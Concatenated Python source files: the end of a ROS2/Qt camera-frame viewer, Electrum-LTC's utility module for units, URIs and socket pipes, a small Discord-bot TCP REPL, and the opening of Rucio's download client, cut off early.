self.delay = round((time.time()-self.t1)*1000,2) # compute the delay
self.fps = int(1/(time.time()-self.t1)) # compute the fps value
self.t1 = time.time() # update the timestamp of the last callback
def get_frames(self):
try:
if self.count_publishers("/image_raw/compressed") and self.data != None: # when a publisher on /image_raw/compressed exists and self.data has been received
self.img = self.bridge.imgmsg_to_cv2(self.data, "bgr8") # convert self.data to an image via CvBridge and store it in self.img
else:
self.img = np.random.randint(255, size=(640,480,3),dtype=np.uint8) # generate a noise frame
return self.img
except CvBridgeError as e:
print(e)
except KeyboardInterrupt:
sys.exit()
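# Illustrative sketch (not part of the original script): GetFrameNode can also be
# spun on its own, without the Qt front end, to check that frames arrive:
#
#     def _debug_spin():
#         rclpy.init()
#         node = GetFrameNode()
#         try:
#             rclpy.spin(node)  # listener_callback keeps node.data / node.fps updated
#         finally:
#             node.destroy_node()
#             rclpy.shutdown()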
def main():
app = QtWidgets.QApplication([])
window = MainWindow()
window.show()
sys.exit(app.exec_())
if __name__ == '__main__':
main()
|
util.py
|
# Electrum - lightweight Bitcoin client
# Copyright (C) 2011 Thomas Voegtlin
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import binascii
import os, sys, re, json, time
from collections import defaultdict
from datetime import datetime
import decimal
from decimal import Decimal
import traceback
import urllib
import threading
import hmac
import stat
from .i18n import _
import urllib.request, urllib.parse, urllib.error
import queue
def inv_dict(d):
return {v: k for k, v in d.items()}
base_units = {'LTC':8, 'mLTC':5, 'uLTC':2, 'sat':0}
base_units_inverse = inv_dict(base_units)
base_units_list = ['LTC', 'mLTC', 'uLTC', 'sat'] # list(dict) does not guarantee order
def decimal_point_to_base_unit_name(dp: int) -> str:
# e.g. 8 -> "LTC"
try:
return base_units_inverse[dp]
except KeyError:
raise Exception('Unknown base unit')
def base_unit_name_to_decimal_point(unit_name: str) -> int:
# e.g. "BTC" -> 8
try:
return base_units[unit_name]
except KeyError:
raise Exception('Unknown base unit')
def normalize_version(v):
return [int(x) for x in re.sub(r'(\.0+)*$','', v).split(".")]
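# Illustrative examples for the helpers above (not part of the original file):
#     decimal_point_to_base_unit_name(8)        -> 'LTC'
#     base_unit_name_to_decimal_point('mLTC')   -> 5
#     normalize_version('3.3.8.0')              -> [3, 3, 8]  # trailing ".0" groups are stripped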
class NotEnoughFunds(Exception): pass
class NoDynamicFeeEstimates(Exception):
def __str__(self):
return _('Dynamic fee estimates not available')
class InvalidPassword(Exception):
def __str__(self):
return _("Incorrect password")
class FileImportFailed(Exception):
def __init__(self, message=''):
self.message = str(message)
def __str__(self):
return _("Failed to import from file.") + "\n" + self.message
class FileExportFailed(Exception):
def __init__(self, message=''):
self.message = str(message)
def __str__(self):
return _("Failed to export to file.") + "\n" + self.message
class TimeoutException(Exception):
def __init__(self, message=''):
self.message = str(message)
def __str__(self):
if not self.message:
return _("Operation timed out.")
return self.message
class WalletFileException(Exception): pass
class BitcoinException(Exception): pass
# Throw this exception to unwind the stack like when an error occurs.
# However unlike other exceptions the user won't be informed.
class UserCancelled(Exception):
'''An exception that is suppressed from the user'''
pass
class Satoshis(object):
def __new__(cls, value):
self = super(Satoshis, cls).__new__(cls)
self.value = value
return self
def __repr__(self):
return 'Satoshis(%d)'%self.value
def __str__(self):
return format_satoshis(self.value) + " LTC"
class Fiat(object):
def __new__(cls, value, ccy):
self = super(Fiat, cls).__new__(cls)
self.ccy = ccy
self.value = value
return self
def __repr__(self):
return 'Fiat(%s)'% self.__str__()
def __str__(self):
if self.value.is_nan():
return _('No Data')
else:
return "{:.2f}".format(self.value) + ' ' + self.ccy
class MyEncoder(json.JSONEncoder):
def default(self, obj):
from .transaction import Transaction
if isinstance(obj, Transaction):
return obj.as_dict()
if isinstance(obj, Satoshis):
return str(obj)
if isinstance(obj, Fiat):
return str(obj)
if isinstance(obj, Decimal):
return str(obj)
if isinstance(obj, datetime):
return obj.isoformat(' ')[:-3]
if isinstance(obj, set):
return list(obj)
return super(MyEncoder, self).default(obj)
class PrintError(object):
'''A handy base class'''
def diagnostic_name(self):
return self.__class__.__name__
def print_error(self, *msg):
# only prints with --verbose flag
print_error("[%s]" % self.diagnostic_name(), *msg)
def print_stderr(self, *msg):
print_stderr("[%s]" % self.diagnostic_name(), *msg)
def print_msg(self, *msg):
print_msg("[%s]" % self.diagnostic_name(), *msg)
class ThreadJob(PrintError):
"""A job that is run periodically from a thread's main loop. run() is
called from that thread's context.
"""
def run(self):
"""Called periodically from the thread"""
pass
class DebugMem(ThreadJob):
'''A handy class for debugging GC memory leaks'''
def __init__(self, classes, interval=30):
self.next_time = 0
self.classes = classes
self.interval = interval
def mem_stats(self):
import gc
self.print_error("Start memscan")
gc.collect()
objmap = defaultdict(list)
for obj in gc.get_objects():
for class_ in self.classes:
if isinstance(obj, class_):
objmap[class_].append(obj)
for class_, objs in objmap.items():
self.print_error("%s: %d" % (class_.__name__, len(objs)))
self.print_error("Finish memscan")
def run(self):
if time.time() > self.next_time:
self.mem_stats()
self.next_time = time.time() + self.interval
class DaemonThread(threading.Thread, PrintError):
""" daemon thread that terminates cleanly """
def __init__(self):
threading.Thread.__init__(self)
self.parent_thread = threading.currentThread()
self.running = False
self.running_lock = threading.Lock()
self.job_lock = threading.Lock()
self.jobs = []
def add_jobs(self, jobs):
with self.job_lock:
self.jobs.extend(jobs)
def run_jobs(self):
# Don't let a throwing job disrupt the thread, future runs of
# itself, or other jobs. This is useful protection against
# malformed or malicious server responses
with self.job_lock:
for job in self.jobs:
try:
job.run()
except Exception as e:
traceback.print_exc(file=sys.stderr)
def remove_jobs(self, jobs):
with self.job_lock:
for job in jobs:
self.jobs.remove(job)
def start(self):
with self.running_lock:
self.running = True
return threading.Thread.start(self)
def is_running(self):
with self.running_lock:
return self.running and self.parent_thread.is_alive()
def stop(self):
with self.running_lock:
self.running = False
def on_stop(self):
if 'ANDROID_DATA' in os.environ:
import jnius
jnius.detach()
self.print_error("jnius detach")
self.print_error("stopped")
# TODO: disable
is_verbose = True
def set_verbosity(b):
global is_verbose
is_verbose = b
def print_error(*args):
if not is_verbose: return
print_stderr(*args)
def print_stderr(*args):
args = [str(item) for item in args]
sys.stderr.write(" ".join(args) + "\n")
sys.stderr.flush()
def print_msg(*args):
# Stringify args
args = [str(item) for item in args]
sys.stdout.write(" ".join(args) + "\n")
sys.stdout.flush()
def json_encode(obj):
try:
s = json.dumps(obj, sort_keys = True, indent = 4, cls=MyEncoder)
except TypeError:
s = repr(obj)
return s
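# Illustrative usage, not part of the original module: MyEncoder lets json_encode() serialise the
# wallet-specific types defined above, e.g.
#   json_encode({'amount': Satoshis(150000000), 'fee_rate': Decimal('100.1')})
# returns a sorted, indented JSON document in which both values are rendered as strings.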
def json_decode(x):
try:
return json.loads(x, parse_float=Decimal)
except:
return x
# taken from Django Source Code
def constant_time_compare(val1, val2):
"""Return True if the two strings are equal, False otherwise."""
return hmac.compare_digest(to_bytes(val1, 'utf8'), to_bytes(val2, 'utf8'))
# decorator that prints execution time
def profiler(func):
def do_profile(func, args, kw_args):
n = func.__name__
t0 = time.time()
o = func(*args, **kw_args)
t = time.time() - t0
print_error("[profiler]", n, "%.4f"%t)
return o
return lambda *args, **kw_args: do_profile(func, args, kw_args)
def android_ext_dir():
import jnius
env = jnius.autoclass('android.os.Environment')
return env.getExternalStorageDirectory().getPath()
def android_data_dir():
import jnius
PythonActivity = jnius.autoclass('org.kivy.android.PythonActivity')
return PythonActivity.mActivity.getFilesDir().getPath() + '/data'
def android_headers_dir():
d = android_ext_dir() + '/org.electrum_ltc.electrum_ltc'
if not os.path.exists(d):
os.mkdir(d)
return d
def android_check_data_dir():
""" if needed, move old directory to sandbox """
ext_dir = android_ext_dir()
data_dir = android_data_dir()
old_electrum_dir = ext_dir + '/electrum-ltc'
if not os.path.exists(data_dir) and os.path.exists(old_electrum_dir):
import shutil
new_headers_path = android_headers_dir() + '/blockchain_headers'
old_headers_path = old_electrum_dir + '/blockchain_headers'
if not os.path.exists(new_headers_path) and os.path.exists(old_headers_path):
print_error("Moving headers file to", new_headers_path)
shutil.move(old_headers_path, new_headers_path)
print_error("Moving data to", data_dir)
shutil.move(old_electrum_dir, data_dir)
return data_dir
def get_headers_dir(config):
return android_headers_dir() if 'ANDROID_DATA' in os.environ else config.path
def assert_datadir_available(config_path):
path = config_path
if os.path.exists(path):
return
else:
raise FileNotFoundError(
'Electrum datadir does not exist. Was it deleted while running?' + '\n' +
'Should be at {}'.format(path))
def assert_file_in_datadir_available(path, config_path):
if os.path.exists(path):
return
else:
assert_datadir_available(config_path)
raise FileNotFoundError(
'Cannot find file but datadir is there.' + '\n' +
'Should be at {}'.format(path))
def assert_bytes(*args):
"""
porting helper, assert args type
"""
try:
for x in args:
assert isinstance(x, (bytes, bytearray))
except:
print('assert bytes failed', list(map(type, args)))
raise
def assert_str(*args):
"""
porting helper, assert args type
"""
for x in args:
assert isinstance(x, str)
def to_string(x, enc):
if isinstance(x, (bytes, bytearray)):
return x.decode(enc)
if isinstance(x, str):
return x
else:
raise TypeError("Not a string or bytes like object")
def to_bytes(something, encoding='utf8'):
"""
cast string to bytes() like object, but for python2 support it's bytearray copy
"""
if isinstance(something, bytes):
return something
if isinstance(something, str):
return something.encode(encoding)
elif isinstance(something, bytearray):
return bytes(something)
else:
raise TypeError("Not a string or bytes like object")
bfh = bytes.fromhex
hfu = binascii.hexlify
def bh2u(x):
"""
str with hex representation of a bytes-like object
>>> x = bytes((1, 2, 10))
>>> bh2u(x)
    '01020a'
:param x: bytes
:rtype: str
"""
return hfu(x).decode('ascii')
def user_dir():
if 'ANDROID_DATA' in os.environ:
return android_check_data_dir()
elif os.name == 'posix':
return os.path.join(os.environ["HOME"], ".electrum-ltc")
elif "APPDATA" in os.environ:
return os.path.join(os.environ["APPDATA"], "Electrum-LTC")
elif "LOCALAPPDATA" in os.environ:
return os.path.join(os.environ["LOCALAPPDATA"], "Electrum-LTC")
else:
#raise Exception("No home directory found in environment variables.")
return
def is_valid_email(s):
regexp = r"[^@]+@[^@]+\.[^@]+"
return re.match(regexp, s) is not None
def format_satoshis_plain(x, decimal_point = 8):
"""Display a satoshi amount scaled. Always uses a '.' as a decimal
point and has no thousands separator"""
scale_factor = pow(10, decimal_point)
return "{:.8f}".format(Decimal(x) / scale_factor).rstrip('0').rstrip('.')
def format_satoshis(x, num_zeros=0, decimal_point=8, precision=None, is_diff=False, whitespaces=False):
from locale import localeconv
if x is None:
return 'unknown'
if precision is None:
precision = decimal_point
decimal_format = ".0" + str(precision) if precision > 0 else ""
if is_diff:
decimal_format = '+' + decimal_format
result = ("{:" + decimal_format + "f}").format(x / pow (10, decimal_point)).rstrip('0')
integer_part, fract_part = result.split(".")
dp = localeconv()['decimal_point']
if len(fract_part) < num_zeros:
fract_part += "0" * (num_zeros - len(fract_part))
result = integer_part + dp + fract_part
if whitespaces:
result += " " * (decimal_point - len(fract_part))
result = " " * (15 - len(result)) + result
return result
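# Illustrative usage, not part of the original module (assumes the locale decimal point is '.'):
#   format_satoshis(1234567)                  -> '0.01234567'
#   format_satoshis(150000000, is_diff=True)  -> '+1.5'
#   format_satoshis(None)                     -> 'unknown'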
FEERATE_PRECISION = 1 # num fractional decimal places for sat/byte fee rates
_feerate_quanta = Decimal(10) ** (-FEERATE_PRECISION)
def format_fee_satoshis(fee, num_zeros=0):
return format_satoshis(fee, num_zeros, 0, precision=FEERATE_PRECISION)
def quantize_feerate(fee):
"""Strip sat/byte fee rate of excess precision."""
if fee is None:
return None
return Decimal(fee).quantize(_feerate_quanta, rounding=decimal.ROUND_HALF_DOWN)
def timestamp_to_datetime(timestamp):
if timestamp is None:
return None
return datetime.fromtimestamp(timestamp)
def format_time(timestamp):
date = timestamp_to_datetime(timestamp)
return date.isoformat(' ')[:-3] if date else _("Unknown")
# Takes a timestamp and returns a string with the approximation of the age
def age(from_date, since_date = None, target_tz=None, include_seconds=False):
if from_date is None:
return "Unknown"
from_date = datetime.fromtimestamp(from_date)
if since_date is None:
since_date = datetime.now(target_tz)
td = time_difference(from_date - since_date, include_seconds)
return td + " ago" if from_date < since_date else "in " + td
def time_difference(distance_in_time, include_seconds):
#distance_in_time = since_date - from_date
distance_in_seconds = int(round(abs(distance_in_time.days * 86400 + distance_in_time.seconds)))
distance_in_minutes = int(round(distance_in_seconds/60))
if distance_in_minutes <= 1:
if include_seconds:
for remainder in [5, 10, 20]:
if distance_in_seconds < remainder:
return "less than %s seconds" % remainder
if distance_in_seconds < 40:
return "half a minute"
elif distance_in_seconds < 60:
return "less than a minute"
else:
return "1 minute"
else:
if distance_in_minutes == 0:
return "less than a minute"
else:
return "1 minute"
elif distance_in_minutes < 45:
return "%s minutes" % distance_in_minutes
elif distance_in_minutes < 90:
return "about 1 hour"
elif distance_in_minutes < 1440:
return "about %d hours" % (round(distance_in_minutes / 60.0))
elif distance_in_minutes < 2880:
return "1 day"
elif distance_in_minutes < 43220:
return "%d days" % (round(distance_in_minutes / 1440))
elif distance_in_minutes < 86400:
return "about 1 month"
elif distance_in_minutes < 525600:
return "%d months" % (round(distance_in_minutes / 43200))
elif distance_in_minutes < 1051200:
return "about 1 year"
else:
return "over %d years" % (round(distance_in_minutes / 525600))
mainnet_block_explorers = {
'Bchain.info': ('https://bchain.info/',
{'tx': 'LTC/tx/', 'addr': 'LTC/addr/'}),
'BlockCypher.com': ('https://live.blockcypher.com/ltc/',
{'tx': 'tx/', 'addr': 'address/'}),
'explorer.litecoin.net': ('http://explorer.litecoin.net/',
{'tx': 'tx/', 'addr': 'address/'}),
'LiteCore': ('https://insight.litecore.io/',
{'tx': 'tx/', 'addr': 'address/'}),
'SoChain': ('https://chain.so/',
{'tx': 'tx/LTC/', 'addr': 'address/LTC/'}),
'system default': ('blockchain://12a765e31ffd4059bada1e25190f6e98c99d9714d334efa41a195a7e7e04bfe2/',
{'tx': 'tx/', 'addr': 'address/'}),
}
testnet_block_explorers = {
'LiteCore': ('https://testnet.litecore.io/',
{'tx': 'tx/', 'addr': 'address/'}),
'SoChain': ('https://chain.so/',
{'tx': 'tx/LTCTEST/', 'addr': 'address/LTCTEST/'}),
'system default': ('blockchain://4966625a4b2851d9fdee139e56211a0d88575f59ed816ff5e6a63deb4e3e29a0/',
{'tx': 'tx/', 'addr': 'address/'}),
}
def block_explorer_info():
from . import constants
return testnet_block_explorers if constants.net.TESTNET else mainnet_block_explorers
def block_explorer(config):
return config.get('block_explorer', 'LiteCore')
def block_explorer_tuple(config):
return block_explorer_info().get(block_explorer(config))
def block_explorer_URL(config, kind, item):
be_tuple = block_explorer_tuple(config)
if not be_tuple:
return
kind_str = be_tuple[1].get(kind)
if not kind_str:
return
url_parts = [be_tuple[0], kind_str, item]
return ''.join(url_parts)
# URL decode
#_ud = re.compile('%([0-9a-hA-H]{2})', re.MULTILINE)
#urldecode = lambda x: _ud.sub(lambda m: chr(int(m.group(1), 16)), x)
def parse_URI(uri, on_pr=None):
from . import bitcoin
from .bitcoin import COIN
if ':' not in uri:
if not bitcoin.is_address(uri):
raise Exception("Not a Litecoin address")
return {'address': uri}
u = urllib.parse.urlparse(uri)
if u.scheme != 'litecoin':
raise Exception("Not a litecoin URI")
address = u.path
# python for android fails to parse query
if address.find('?') > 0:
address, query = u.path.split('?')
pq = urllib.parse.parse_qs(query)
else:
pq = urllib.parse.parse_qs(u.query)
for k, v in pq.items():
if len(v)!=1:
raise Exception('Duplicate Key', k)
out = {k: v[0] for k, v in pq.items()}
if address:
if not bitcoin.is_address(address):
raise Exception("Invalid Litecoin address:" + address)
out['address'] = address
if 'amount' in out:
am = out['amount']
        m = re.match(r'([0-9.]+)X([0-9])', am)
if m:
k = int(m.group(2)) - 8
amount = Decimal(m.group(1)) * pow( Decimal(10) , k)
else:
amount = Decimal(am) * COIN
out['amount'] = int(amount)
if 'message' in out:
out['message'] = out['message']
out['memo'] = out['message']
if 'time' in out:
out['time'] = int(out['time'])
if 'exp' in out:
out['exp'] = int(out['exp'])
if 'sig' in out:
out['sig'] = bh2u(bitcoin.base_decode(out['sig'], None, base=58))
r = out.get('r')
sig = out.get('sig')
name = out.get('name')
if on_pr and (r or (name and sig)):
def get_payment_request_thread():
from . import paymentrequest as pr
if name and sig:
s = pr.serialize_request(out).SerializeToString()
request = pr.PaymentRequest(s)
else:
request = pr.get_payment_request(r)
if on_pr:
on_pr(request)
t = threading.Thread(target=get_payment_request_thread)
t.setDaemon(True)
t.start()
return out
def create_URI(addr, amount, message):
from . import bitcoin
if not bitcoin.is_address(addr):
return ""
query = []
if amount:
query.append('amount=%s'%format_satoshis_plain(amount))
if message:
query.append('message=%s'%urllib.parse.quote(message))
p = urllib.parse.ParseResult(scheme='litecoin', netloc='', path=addr, params='', query='&'.join(query), fragment='')
return urllib.parse.urlunparse(p)
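# Illustrative usage, not part of the original module (the address is a placeholder and must be a
# valid Litecoin address for bitcoin.is_address() to accept it):
#   create_URI('<valid LTC address>', 150000000, 'donation')
#   -> 'litecoin:<valid LTC address>?amount=1.5&message=donation'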
# Python bug (http://bugs.python.org/issue1927) causes raw_input
# to be redirected improperly between stdin/stderr on Unix systems
#TODO: py3
def raw_input(prompt=None):
if prompt:
sys.stdout.write(prompt)
return builtin_raw_input()
import builtins
builtin_raw_input = builtins.input
builtins.input = raw_input
def parse_json(message):
# TODO: check \r\n pattern
n = message.find(b'\n')
if n==-1:
return None, message
try:
j = json.loads(message[0:n].decode('utf8'))
except:
j = None
return j, message[n+1:]
class timeout(Exception):
pass
import socket
import json
import ssl
import time
class SocketPipe:
def __init__(self, socket):
self.socket = socket
self.message = b''
self.set_timeout(0.1)
self.recv_time = time.time()
def set_timeout(self, t):
self.socket.settimeout(t)
def idle_time(self):
return time.time() - self.recv_time
def get(self):
while True:
response, self.message = parse_json(self.message)
if response is not None:
return response
try:
data = self.socket.recv(1024)
except socket.timeout:
raise timeout
except ssl.SSLError:
raise timeout
except socket.error as err:
if err.errno == 60:
raise timeout
elif err.errno in [11, 35, 10035]:
print_error("socket errno %d (resource temporarily unavailable)"% err.errno)
time.sleep(0.2)
raise timeout
else:
print_error("pipe: socket error", err)
data = b''
except:
traceback.print_exc(file=sys.stderr)
data = b''
if not data: # Connection closed remotely
return None
self.message += data
self.recv_time = time.time()
def send(self, request):
out = json.dumps(request) + '\n'
out = out.encode('utf8')
self._send(out)
def send_all(self, requests):
out = b''.join(map(lambda x: (json.dumps(x) + '\n').encode('utf8'), requests))
self._send(out)
def _send(self, out):
while out:
try:
sent = self.socket.send(out)
out = out[sent:]
except ssl.SSLError as e:
print_error("SSLError:", e)
time.sleep(0.1)
continue
class QueuePipe:
def __init__(self, send_queue=None, get_queue=None):
self.send_queue = send_queue if send_queue else queue.Queue()
self.get_queue = get_queue if get_queue else queue.Queue()
self.set_timeout(0.1)
def get(self):
try:
return self.get_queue.get(timeout=self.timeout)
except queue.Empty:
raise timeout
def get_all(self):
responses = []
while True:
try:
r = self.get_queue.get_nowait()
responses.append(r)
except queue.Empty:
break
return responses
def set_timeout(self, t):
self.timeout = t
def send(self, request):
self.send_queue.put(request)
def send_all(self, requests):
for request in requests:
self.send(request)
def setup_thread_excepthook():
"""
Workaround for `sys.excepthook` thread bug from:
http://bugs.python.org/issue1230540
Call once from the main thread before creating any threads.
"""
init_original = threading.Thread.__init__
def init(self, *args, **kwargs):
init_original(self, *args, **kwargs)
run_original = self.run
def run_with_except_hook(*args2, **kwargs2):
try:
run_original(*args2, **kwargs2)
except Exception:
sys.excepthook(*sys.exc_info())
self.run = run_with_except_hook
threading.Thread.__init__ = init
def versiontuple(v):
return tuple(map(int, (v.split("."))))
def import_meta(path, validater, load_meta):
try:
with open(path, 'r', encoding='utf-8') as f:
d = validater(json.loads(f.read()))
load_meta(d)
#backwards compatibility for JSONDecodeError
except ValueError:
traceback.print_exc(file=sys.stderr)
raise FileImportFailed(_("Invalid JSON code."))
except BaseException as e:
traceback.print_exc(file=sys.stdout)
raise FileImportFailed(e)
def export_meta(meta, fileName):
try:
with open(fileName, 'w+', encoding='utf-8') as f:
json.dump(meta, f, indent=4, sort_keys=True)
except (IOError, os.error) as e:
traceback.print_exc(file=sys.stderr)
raise FileExportFailed(e)
def make_dir(path, allow_symlink=True):
"""Make directory if it does not yet exist."""
if not os.path.exists(path):
if not allow_symlink and os.path.islink(path):
raise Exception('Dangling link: ' + path)
os.mkdir(path)
os.chmod(path, stat.S_IRUSR | stat.S_IWUSR | stat.S_IXUSR)
|
repl.py
|
import inspect
import itertools
import socket
import threading
from src.config import bc
from src.log import log
REPL_HOST = ''
class REPLCommands:
@staticmethod
def help(message):
commands = [func[0] for func in inspect.getmembers(REPLCommands, inspect.isfunction)
if not func[0].startswith('_')]
return ', '.join(commands)
@staticmethod
def ping(message):
return "Pong!"
@staticmethod
def channels(message):
        channels = ((channel.id, channel.name) for channel in
                    itertools.chain.from_iterable(guild.text_channels for guild in bc.guilds))
        result = ""
        for channel_id, channel_name in channels:
            result += f"{channel_id} -> {channel_name}\n"
return result
class Repl:
def __init__(self, port) -> None:
self.channel = None
self.sock = None
self.port = port
thread = threading.Thread(target=self.start)
thread.setDaemon(True)
thread.start()
def parse_command(self, message) -> str:
message = message.split(' ')
commands = [func[0] for func in inspect.getmembers(REPLCommands, inspect.isfunction)
if not func[0].startswith('_')]
if message[0] in commands:
return getattr(REPLCommands, message[0])(message).strip() + '\n'
return "\n"
def start(self) -> None:
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM, 0)
        # setsockopt sets one option per call, so apply SO_REUSEADDR and (where available) SO_REUSEPORT separately
        self.sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        if hasattr(socket, "SO_REUSEPORT"):
            self.sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEPORT, 1)
self.sock.bind((REPL_HOST, self.port))
self.sock.listen()
        log.debug(f"REPL initialized on port {self.port}")
        while True:
try:
conn, addr = self.sock.accept()
with conn:
log.debug(f"Connected by {addr}")
while True:
conn.send("> ".encode("utf-8"))
data = conn.recv(1024)
if not data:
break
conn.send(self.parse_command(data.decode("utf-8").strip()).encode("utf-8"))
except OSError as e:
log.warning(f"REPL: {e}")
def stop(self):
if self.sock:
self.sock.close()
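# Illustrative usage, not part of the original module: the bot is expected to start the REPL with
# something like `Repl(8888)`, after which one can attach with e.g. `nc localhost 8888` and issue
# the commands listed by `help` (ping, channels, ...).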
|
downloadclient.py
|
# Copyright 2018 CERN for the benefit of the ATLAS collaboration.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Authors:
# - Tomas Javurek <tomasjavurek09@gmail.com>, 2018
# - Vincent Garonne <vgaronne@gmail.com>, 2018
# - Joaquin Bogado <jbogado@linti.unlp.edu.ar>, 2018
# - Nicolo Magini <nicolo.magini@cern.ch>, 2018-2019
# - Tobias Wegner <tobias.wegner@cern.ch>, 2018-2019
# - Hannes Hansen <hannes.jakob.hansen@cern.ch>, 2018-2019
#
# PY3K COMPATIBLE
from __future__ import division
import copy
import logging
import os
import random
import shutil
import signal
import time
try:
from Queue import Queue, Empty, deque
except ImportError:
from queue import Queue, Empty, deque
from threading import Thread
from rucio.client.client import Client
from rucio.common.exception import (InputValidationError, NoFilesDownloaded, NotAllFilesDownloaded, RucioException)
from rucio.common.pcache import Pcache
from rucio.common.utils import adler32, md5, detect_client_location, generate_uuid, parse_replicas_from_string, send_trace, sizefmt, execute, parse_replicas_from_file
from rucio.rse import rsemanager as rsemgr
from rucio import version
class BaseExtractionTool:
def __init__(self, program_name, useability_check_args, extract_args, logger):
"""
        Initialises an extraction tool object
        :param program_name: the name of the archive extraction program, e.g., unzip
        :param useability_check_args: the arguments of the extraction program to test if it is installed, e.g., --version
:param extract_args: the arguments that will be passed to the program for extraction
:param logger: logging.Logger object
"""
self.program_name = program_name
self.useability_check_args = useability_check_args
self.extract_args = extract_args
self.logger = logger
        self.is_usable_result = None  # cached result of is_useable()
def is_useable(self):
"""
Checks if the extraction tool is installed and usable
:returns: True if it is usable otherwise False
"""
        if self.is_usable_result is not None:
            return self.is_usable_result
        self.is_usable_result = False
cmd = '%s %s' % (self.program_name, self.useability_check_args)
try:
exitcode, out, err = execute(cmd)
exitcode = int(exitcode)
self.logger.debug('"%s" returned with exitcode %d' % (cmd, exitcode))
self.is_usable_result = (exitcode == 0)
except Exception as error:
            self.logger.debug('Failed to execute: "%s"' % cmd)
self.logger.debug(error)
return self.is_usable_result
def try_extraction(self, archive_file_path, file_to_extract, dest_dir_path):
"""
Calls the extraction program to extract a file from an archive
:param archive_file_path: path to the archive
:param file_to_extract: file name to extract from the archive
:param dest_dir_path: destination directory where the extracted file will be stored
:returns: True on success otherwise False
"""
if not self.is_useable():
return False
args_map = {'archive_file_path': archive_file_path,
'file_to_extract': file_to_extract,
'dest_dir_path': dest_dir_path}
extract_args = self.extract_args % args_map
cmd = '%s %s' % (self.program_name, extract_args)
try:
exitcode, out, err = execute(cmd)
exitcode = int(exitcode)
self.logger.debug('"%s" returned with exitcode %d' % (cmd, exitcode))
return (exitcode == 0)
except Exception as error:
            self.logger.debug('Failed to execute: "%s"' % cmd)
self.logger.debug(error)
return False
class DownloadClient:
def __init__(self, client=None, logger=None, tracing=True, check_admin=False, check_pcache=False):
"""
        Initialises the basic settings for a DownloadClient object
        :param client: Optional: rucio.client.client.Client object. If None, a new object will be created.
        :param logger: Optional: logging.Logger object to use for downloads. If None nothing will be logged.
        :param tracing: Optional: if False, no traces will be sent
        :param check_admin: Optional: if True, checks whether the account has the admin attribute and, if so, does not exclude tape RSEs
        :param check_pcache: Optional: if True, the local pcache is consulted before downloading
"""
if not logger:
logger = logging.getLogger('%s.null' % __name__)
logger.disabled = True
self.check_pcache = check_pcache
self.logger = logger
self.tracing = tracing
if not self.tracing:
logger.debug('Tracing is turned off.')
self.is_human_readable = True
self.client = client if client else Client()
self.client_location = detect_client_location()
self.is_tape_excluded = True
self.is_admin = False
if check_admin:
account_attributes = list(self.client.list_account_attributes(self.client.account))
for attr in account_attributes[0]:
if attr['key'] == 'admin':
self.is_admin = attr['value'] is True
break
if self.is_admin:
self.is_tape_excluded = False
logger.debug('Admin mode enabled')
self.trace_tpl = {}
self.trace_tpl['hostname'] = self.client_location['fqdn']
self.trace_tpl['localSite'] = self.client_location['site']
self.trace_tpl['account'] = self.client.account
self.trace_tpl['eventType'] = 'download'
self.trace_tpl['eventVersion'] = 'api_%s' % version.RUCIO_VERSION[0]
self.use_cea_threshold = 10
self.extraction_tools = []
# unzip <archive_file_path> <did_name> -d <dest_dir_path>
extract_args = '%(archive_file_path)s %(file_to_extract)s -d %(dest_dir_path)s'
self.extraction_tools.append(BaseExtractionTool('unzip', '-v', extract_args, logger))
# tar -C <dest_dir_path> -xf <archive_file_path> <did_name>
extract_args = '-C %(dest_dir_path)s -xf %(archive_file_path)s %(file_to_extract)s'
self.extraction_tools.append(BaseExtractionTool('tar', '--version', extract_args, logger))
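        # Illustrative sketch, not part of the original client: further extractors could be
        # registered with the same pattern, where the program name and its check/extract
        # arguments are placeholders for whatever tool is available on the host:
        #   self.extraction_tools.append(BaseExtractionTool('<prog>', '<version-check args>',
        #                                                   '<extract args using %(archive_file_path)s etc.>', logger))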
def download_pfns(self, items, num_threads=2, trace_custom_fields={}, traces_copy_out=None):
"""
Download items with a given PFN. This function can only download files, no datasets.
:param items: List of dictionaries. Each dictionary describing a file to download. Keys:
pfn - PFN string of this file
did - DID string of this file (e.g. 'scope:file.name'). Wildcards are not allowed
rse - rse name (e.g. 'CERN-PROD_DATADISK'). RSE Expressions are not allowed
base_dir - Optional: Base directory where the downloaded files will be stored. (Default: '.')
no_subdir - Optional: If true, files are written directly into base_dir and existing files are overwritten. (Default: False)
ignore_checksum - Optional: If true, the checksum validation is skipped (for pfn downloads the checksum must be given explicitly). (Default: True)
transfer_timeout - Optional: Timeout time for the download protocols. (Default: None)
:param num_threads: Suggestion of number of threads to use for the download. It will be lowered if it's too high.
:param trace_custom_fields: Custom key value pairs to send with the traces
:param traces_copy_out: reference to an external list, where the traces should be uploaded
:returns: a list of dictionaries with an entry for each file, containing the input options, the did, and the clientState
clientState can be one of the following: ALREADY_DONE, DONE, FILE_NOT_FOUND, FAIL_VALIDATE, FAILED
:raises InputValidationError: if one of the input items is in the wrong format
:raises NoFilesDownloaded: if no files could be downloaded
:raises NotAllFilesDownloaded: if not all files could be downloaded
:raises RucioException: if something unexpected went wrong during the download
"""
logger = self.logger
trace_custom_fields['uuid'] = generate_uuid()
